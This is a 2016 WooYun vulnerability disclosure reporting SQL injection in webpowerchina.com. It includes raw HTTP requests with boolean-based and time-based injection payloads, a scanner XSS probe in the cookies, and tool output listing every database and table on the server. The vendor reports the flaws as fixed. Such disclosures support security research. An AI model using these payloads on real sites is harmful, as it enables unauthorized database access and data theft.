当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0190112

漏洞标题:webpower多处发现sql注入

相关厂商:webpower

漏洞作者: 唐小风

提交时间:2016-03-28 18:25

修复时间:2016-03-29 10:27

公开时间:2016-03-29 10:27

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经修复

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-03-28: 细节已通知厂商并且等待厂商处理中
2016-03-29: 厂商已经确认,细节仅向厂商公开
2016-03-29: 厂商已经修复漏洞并主动公开,细节向公众公开

简要描述:

发现好几个注入点 !!! 讲道理 。.。# 给个激活码吧 !!

详细说明:

GET /case/case.php?id=-1%20OR%203*2*1%3d6%20AND%20000819%3d000819%20--%20 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.webpowerchina.com:80/
Cookie: PHPSESSID=q1ci4g98545c35upkr3k1kct84; Hm_lvt_f9f5dc02f2641cc57849f0dd787c856b=1459158007,1459158153,1459158270,1459158424; Hm_lpvt_f9f5dc02f2641cc57849f0dd787c856b=1459158424; wt3_eid=%3B424535895385461%7C2145915760900367143%232145915842300558358; wt3_sid=%3B424535895385461; HMACCOUNT=CF1DF2E45C32ABDA; AWSELB=4743DD810E1C3A37CA32C8C951318F0E650B60F936947BED01B4EF28EEE21F669286F4C9CA79FCFCA481BAC8515D1A327D4FF020898E026D35B138F1F824E07C37377DD5F7; BAIDUID=2624913B13454C384CBD158CDE4BC7DE:FG=1; BAIDU_SSP_lcr=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss")
Host: www.webpowerchina.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


111.png


GET /case/case.php?id=-1%20OR%203*2*1%3d6%20AND%20000819%3d000819%20--%20 HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.webpowerchina.com:80/
Cookie: PHPSESSID=q1ci4g98545c35upkr3k1kct84; Hm_lvt_f9f5dc02f2641cc57849f0dd787c856b=1459158007,1459158153,1459158270,1459158424; Hm_lpvt_f9f5dc02f2641cc57849f0dd787c856b=1459158424; wt3_eid=%3B424535895385461%7C2145915760900367143%232145915842300558358; wt3_sid=%3B424535895385461; HMACCOUNT=CF1DF2E45C32ABDA; AWSELB=4743DD810E1C3A37CA32C8C951318F0E650B60F936947BED01B4EF28EEE21F669286F4C9CA79FCFCA481BAC8515D1A327D4FF020898E026D35B138F1F824E07C37377DD5F7; BAIDUID=2624913B13454C384CBD158CDE4BC7DE:FG=1; BAIDU_SSP_lcr=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss")
Host: www.webpowerchina.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


222.png


GET /case/page.php?cases_type=1002&id=if(now()%3dsysdate()%2csleep(0)%2c0)/*'XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR'%22XOR(if(now()%3dsysdate()%2csleep(0)%2c0))OR%22*/ HTTP/1.1
X-Requested-With: XMLHttpRequest
Referer: http://www.webpowerchina.com:80/
Cookie: PHPSESSID=q1ci4g98545c35upkr3k1kct84; Hm_lvt_f9f5dc02f2641cc57849f0dd787c856b=1459158007,1459158153,1459158270,1459158424; Hm_lpvt_f9f5dc02f2641cc57849f0dd787c856b=1459158424; wt3_eid=%3B424535895385461%7C2145915760900367143%232145915842300558358; wt3_sid=%3B424535895385461; HMACCOUNT=CF1DF2E45C32ABDA; AWSELB=4743DD810E1C3A37CA32C8C951318F0E650B60F936947BED01B4EF28EEE21F669286F4C9CA79FCFCA481BAC8515D1A327D4FF020898E026D35B138F1F824E07C37377DD5F7; BAIDUID=2624913B13454C384CBD158CDE4BC7DE:FG=1; BAIDU_SSP_lcr=http://www.acunetix-referrer.com/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss")
Host: www.webpowerchina.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*


333.png

漏洞证明:

[18:13:19] [INFO] testing MySQL
[18:13:20] [INFO] confirming MySQL
[18:13:20] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.3, Apache
back-end DBMS: MySQL >= 5.0.0
[18:13:20] [INFO] fetching database names
[18:13:20] [INFO] fetching tables for databases: 'wp-e-sight-en, wp-e-sight, wp_e-home, wp_tl-group, information_schema, k11_birthday, k11_optin, ktest, mysql, phpmyadmin, site_xbox, task, ued_wiki, webpower_website, wechat_site, wp_faq, wp_task, wp_webpowerasia, wp_website'
Database: wp_task
[11 tables]
+---------------------------------------+
| task_address |
| task_coding_add |
| task_coding_type |
| task_industry |
| task_list |
| task_login_log |
| task_modify |
| task_tag |
| task_type |
| task_upload |
| task_user |
+---------------------------------------+
Database: phpmyadmin
[12 tables]
+---------------------------------------+
| pma_bookmark |
| pma_column_info |
| pma_designer_coords |
| pma_history |
| pma_pdf_pages |
| pma_recent |
| pma_relation |
| pma_table_coords |
| pma_table_info |
| pma_table_uiprefs |
| pma_tracking |
| pma_userconfig |
+---------------------------------------+
Database: wp_e-home
[14 tables]
+---------------------------------------+
| manage_about |
| manage_admin |
| manage_admin_log |
| manage_banner |
| manage_config |
| manage_h_banner |
| manage_jobs |
| manage_link |
| manage_news |
| manage_partner |
| manage_product |
| manage_subscribe |
| manage_video |
| partner_category |
+---------------------------------------+
Database: k11_optin
[4 tables]
+---------------------------------------+
| manage_admin |
| manage_admin_log |
| manage_config |
| manage_signup |
+---------------------------------------+
Database: ktest
[12 tables]
+---------------------------------------+
| manage_about |
| manage_aboutus |
| manage_admin |
| manage_admin_log |
| manage_case |
| manage_city |
| manage_config |
| manage_homepic |
| manage_human |
| manage_league |
| manage_news |
| manage_pichome |
+---------------------------------------+
Database: wp-e-sight
[19 tables]
+---------------------------------------+
| wp_bold_magazine_layout |
| wp_bold_magazine_layout_position |
| wp_bold_magazine_setting |
| wp_bold_magazine_shortcode |
| wp_bold_magazine_shortcode_wrap |
| wp_bold_magazine_sidebar |
| wp_bold_magazine_sidebar_position |
| wp_bold_magazine_template_hierarchy |
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+---------------------------------------+
Database: wechat_site
[12 tables]
+---------------------------------------+
| industry_category |
| manage_about |
| manage_admin |
| manage_admin_log |
| manage_banner |
| manage_config |
| manage_event |
| manage_ibanner |
| manage_industry |
| manage_news |
| manage_signup |
| news_category |
+---------------------------------------+
Database: wp-e-sight-en
[19 tables]
+---------------------------------------+
| wp_bold_magazine_layout |
| wp_bold_magazine_layout_position |
| wp_bold_magazine_setting |
| wp_bold_magazine_shortcode |
| wp_bold_magazine_shortcode_wrap |
| wp_bold_magazine_sidebar |
| wp_bold_magazine_sidebar_position |
| wp_bold_magazine_template_hierarchy |
| wp_commentmeta |
| wp_comments |
| wp_links |
| wp_options |
| wp_postmeta |
| wp_posts |
| wp_term_relationships |
| wp_term_taxonomy |
| wp_terms |
| wp_usermeta |
| wp_users |
+---------------------------------------+
Database: wp_website
[16 tables]
+---------------------------------------+
| cases_category |
| customer_category |
| manage_about |
| manage_admin |
| manage_admin_log |
| manage_apply |
| manage_cases |
| manage_config |
| manage_customer |
| manage_event |
| manage_links |
| manage_mt |
| manage_news |
| manage_post |
| post_category |
| tag_category |
+---------------------------------------+
Database: site_xbox
[4 tables]
+---------------------------------------+
| manage_admin |
| manage_admin_log |
| manage_config |
| manage_order |
+---------------------------------------+
Database: webpower_website
[24 tables]
+---------------------------------------+
| classicalcourse_feedback |
| contact_feedback |
| manage_about |
| manage_admin |
| manage_admin_log |
| manage_config |
| manage_event |
| manage_salon |
| manage_ssalon |
| manage_ssalonuser |
| manage_talk |
| manage_talkuser |
| media_feedback |
| wp_class |
| wp_client |
| wp_faq |
| wp_glossary |
| wp_links |
| wp_news |
| wp_service |
| wp_solve |
| wp_subscribe |
| wp_trydmdelivery |
| wp_whitepapers |
+---------------------------------------+
Database: wp_webpowerasia
[16 tables]
+---------------------------------------+
| cases_category |
| customer_category |
| manage_about |
| manage_admin |
| manage_admin_log |
| manage_apply |
| manage_cases |
| manage_config |
| manage_customer |
| manage_event |
| manage_links |
| manage_mt |
| manage_news |
| manage_post |
| post_category |
| tag_category |
+---------------------------------------+
Database: task
[11 tables]
+---------------------------------------+
| task_address |
| task_coding_add |
| task_coding_type |
| task_industry |
| task_list |
| task_login_log |
| task_modify |
| task_tag |
| task_type |
| task_upload |
| task_user |
+---------------------------------------+
Database: wp_faq
[7 tables]
+---------------------------------------+
| manage_about |
| manage_admin |
| manage_admin_log |
| manage_config |
| manage_news |
| manage_signup |
| news_category |
+---------------------------------------+
Database: mysql
[23 tables]
+---------------------------------------+
| user |
| columns_priv |
| db |
| event |
| func |
| general_log |
| help_category |
| help_keyword |
| help_relation |
| help_topic |
| host |
| ndb_binlog_index |
| plugin |
| proc |
| procs_priv |
| servers |
| slow_log |
| tables_priv |
| time_zone |
| time_zone_leap_second |
| time_zone_name |
| time_zone_transition |
| time_zone_transition_type |
+---------------------------------------+
Database: wp_tl-group
[11 tables]
+---------------------------------------+
| jobs_category |
| manage_about |
| manage_admin |
| manage_admin_log |
| manage_banner |
| manage_config |
| manage_feedback |
| manage_jobs |
| manage_news |
| manage_subscribe |
| manage_teambanner |
+---------------------------------------+
Database: k11_birthday
[5 tables]
+---------------------------------------+
| manage_admin |
| manage_admin_log |
| manage_config |
| manage_list |
| manage_phone |
+---------------------------------------+
Database: ued_wiki
[49 tables]
+---------------------------------------+
| ued_archive |
| ued_category |
| ued_categorylinks |
| ued_change_tag |
| ued_externallinks |
| ued_filearchive |
| ued_image |
| ued_imagelinks |
| ued_interwiki |
| ued_ipblocks |
| ued_iwlinks |
| ued_job |
| ued_l10n_cache |
| ued_langlinks |
| ued_log_search |
| ued_logging |
| ued_module_deps |
| ued_msg_resource |
| ued_msg_resource_links |
| ued_objectcache |
| ued_oldimage |
| ued_page |
| ued_page_props |
| ued_page_restrictions |
| ued_pagelinks |
| ued_protected_titles |
| ued_querycache |
| ued_querycache_info |
| ued_querycachetwo |
| ued_recentchanges |
| ued_redirect |
| ued_revision |
| ued_searchindex |
| ued_site_identifiers |
| ued_site_stats |
| ued_sites |
| ued_tag_summary |
| ued_templatelinks |
| ued_text |
| ued_transcache |
| ued_updatelog |
| ued_uploadstash |
| ued_user |
| ued_user_former_groups |
| ued_user_groups |
| ued_user_newtalk |
| ued_user_properties |
| ued_valid_tag |
| ued_watchlist |
+---------------------------------------+
Database: information_schema
[28 tables]
+---------------------------------------+
| CHARACTER_SETS |
| COLLATIONS |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS |
| COLUMN_PRIVILEGES |
| ENGINES |
| EVENTS |
| FILES |
| GLOBAL_STATUS |
| GLOBAL_VARIABLES |
| KEY_COLUMN_USAGE |
| PARTITIONS |
| PLUGINS |
| PROCESSLIST |
| PROFILING |
| REFERENTIAL_CONSTRAINTS |
| ROUTINES |
| SCHEMATA |
| SCHEMA_PRIVILEGES |
| SESSION_STATUS |
| SESSION_VARIABLES |
| STATISTICS |
| TABLES |
| TABLE_CONSTRAINTS |
| TABLE_PRIVILEGES |
| TRIGGERS |
| USER_PRIVILEGES |
| VIEWS |
+---------------------------------------+

修复方案:

过滤

版权声明:转载请注明来源 唐小风@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:5

确认时间:2016-03-29 10:26

厂商回复:

已确认,并修复

最新状态:

2016-03-29:已修复

漏洞评价:

评价

  1. 2016-03-29 19:56 | jglimmers ( 路人 | Rank:4 漏洞数:1 | 最美不过久别重逢炮。)

    看来你也是升到 rolling 的伙伴儿.

  2. 2016-03-30 12:13 | 唐小风 ( 路人 | Rank:2 漏洞数:1 | 撩妹狂魔)

    @jglimmers 哈哈哈